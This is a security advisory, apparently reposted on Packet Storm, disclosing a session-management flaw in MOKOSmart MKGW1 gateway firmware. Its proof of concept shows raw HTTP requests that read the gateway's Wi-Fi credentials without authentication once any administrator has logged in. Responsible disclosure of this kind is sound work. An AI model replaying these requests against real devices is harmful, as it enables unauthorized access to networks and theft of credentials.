exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MOKOSmart MKGW1 Gateway Improper Session Management

MOKOSmart MKGW1 Gateway Improper Session Management
Posted Dec 20, 2023
Authored by David Gnedt, Jakob Hagl | Site sba-research.org

MOKOSmart MKGW1 Gateway devices with firmware version 1.1.1 or below do not provide an adequate session management for the administrative web interface. This allows adjacent attackers with access to the management network to read and modify the configuration of the device.

tags | exploit, web
SHA-256 | c694be2f3aeadf3e34a15c75c0c332496dca8eac6b5590d03759fec352bbdae6

MOKOSmart MKGW1 Gateway Improper Session Management

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

# MOKOSmart MKGW1 Gateway Improper Session Management #

Link: https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220120-01_MOKOSmart_MKGW1_Gateway_Improper_Session_Management

## Vulnerability Overview ##

MOKOSmart MKGW1 Gateway devices with firmware version 1.1.1 or below do
not provide an adequate session management for the administrative web
interface. This allows adjacent attackers with access to the management
network to read and modify the configuration of the device.

* **Identifier** : SBA-ADV-20220120-01
* **Type of Vulnerability** : Improper Authentication
* **Software/Product Name** : [MOKOSmart MKGW1 BLE Gateway](https://www.mokosmart.com/mokosmart-mkgw1-gateway-iot-cloud-platform/)
* **Vendor** : [MOKO TECHNOLOGY LTD](https://www.mokosmart.com/)
* **Affected Versions** : <= 1.1.1
* **Fixed in Version** : Not yet
* **CVE ID** : Pending
* **CVSS Vector** : CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
* **CVSS Base Score** : 8.0 (High)

## Vendor Description ##

> * MKGW1 Bluetooth gateway is mainly used for the MOKO Bluetooth products.
> * It is convenient for users to get the data of the MOKO series Beacon,
> and advertising raw data of any Bluetooth device.
> * It can upload the data to the server via MQTT (V3.1.1) or HTTP(S)
> protocol.
> * MKGW1 was developed with MediaTek® MT7688AN relying on OpenWrt system
> and Nordic® nRF52 platform.
> * MKGW1 can connect the standard MQTT Broker, Aws IOT, Azure IOT HUB,
> Aliyun IOT.

Source: <http://doc.mokotechnology.com/index.php?s=/page/108>

## Impact ##

By exploiting the documented vulnerability, an attacker can gain
administrative access to the device. For example, this can be misused by
altering the configuration of the device or by reading out the configured
network credentials and therefore getting a foothold in the victim's network.

## Vulnerability Description ##

The gateway offers a web-based configuration interface that can be used to
edit the configuration of the gateway. Username and password are requested
to authenticate the administrator. After sending the correct credentials the
device sets a global server-side state to "logged in" for 3600 seconds,
rather than issuing a session ID. Now any device on the same network can
access the configuration interface as administrator without any additional
authentication and read and modify the configuration.

## Proof of Concept ##

Login with the admin credentials on the web interface from a legitimate
client:

HTTP request:

```http
POST /goform/login HTTP/1.1
Host: 192.168.22.1
Content-Type: application/json
Content-Length: 39
Origin: http://192.168.22.1
Connection: close
Referer: http://192.168.22.1/sign_in

{"username":"Admin","password":"[redacted]"}
```

HTTP response:

```http
HTTP/1.1 200 OK
Content-type: application/json
Pragma: no-cache
Cache-Control: no-cache

{ "state": { "code": 2000, "msg": "ok" }, "data": { "activetime": "3600" } }
```

The response shown above does not contain any session identifier.
On another client that can reach the web interface, an attacker can read out
the configuration without any authentication:

HTTP request:

```http
GET /goform/get_wan HTTP/1.1
Host: 192.168.22.1
Connection: close
```

HTTP response:

```http
HTTP/1.1 200 OK
Content-type: application/json

{ "state": { "code": 2000, "msg": "ok" }, "data": { "wanmode": "WIFI", "wanssid": "[redacted]", "wanencrypt": "[redacted]", "wanpassword": "[redacted]", "proto": "dhcp", "ipaddr": "", "netmask": "", "gateway": "", "firdns": "", "secdns": "" } }
```

The above proof-of-concept shows that the MOKO gateway cannot distinguish
between multiple sessions. Therefore, if a legitimate client is logged in,
an attacker can read the configuration. Furthermore, an attacker can also
modify the configuration by sending the appropriate `JSON` data to the
respective `POST` endpoint. Changes to the network can trigger a reboot
of the device.

## Recommended Countermeasures ##

We are not aware of a vendor fix yet. Please contact the vendor.

We recommend to implement a proper session management for the
administrative web interface of the device.

## Timeline ##

* `2022-01-20`: identification of vulnerability in version 1.1.1
* `2022-01-27`: initial vendor contact
* `2022-03-02`: disclosed vulnerability to vendor contact but received no reply
* `2023-12-11`: request CVE from MITRE
* `2023-12-12`: public disclosure

## References ##

* [Moko Gateway Documentation](https://www.mokosmart.com/wp-content/uploads/2019/10/GS-gateway.pdf)

## Credits ##

* Jakob Hagl ([SBA Research](https://www.sba-research.org/))
* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWB8iQACgkQ+7iGL1j3
dbK0eg//atfWytZOUPJ3omp9Rjb9sMJwu1Z8LdEZZGsQdsmQXJLaKF3AUDnt2cBx
CLPVDh32lFbszJiMrJrXjj5WxH8CUtNQFdj1WTN4Uv5MlaRRvipOz7/XTemqRwGP
+nctTDZHLFCeli4ZD36tE4zKcP3vm+R4e7Zy5BIP74G2Dw2hmFreSt7CC5CqZT3K
oPo1hMF9PD7WhjYK/lBaxeR+6FkiCm7p/thgyeShHMVygJJjmjF+k3GQ61NmoVXc
IjwRs+WY8Y/X/SfPjM8tjW/gZFHdOv/r/Gcz1OJs2D2quqmiKuoOhS9b/F8LDHsf
OnKTNBaWH2oTzmuh7zSan+kPYj42gjpp+aSSoWK7At78yFFvLilCcckwIpKagh4U
b3W//s5BPKCXJ1a7yH3WYGjbDAOzGMq1g50X1ZDNQ7zdQbELobFSNLWsnPwfN64i
ljq6tXTOYT+4Jg4hI5I+3vD4q7mf7O2CL4fk5pUHoKMy7P28sxa7wX2jH+02C07J
PKkaU+V2v4Lvf3PQvGTeupo50bTZX0xYqdmjjr3G9SUD+jESMCHPGaXw/Zpau71U
uKD9f9MbZ9v/XML3IsBvd22QkayL7eegvmweyLmchp/ppigp99IX3rA7EgGkauW7
1W7YiybQOvo5xaCiMakIqHXZtFcWIEryT8FRMW5cyraExHGkPPk=
=jrYM
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close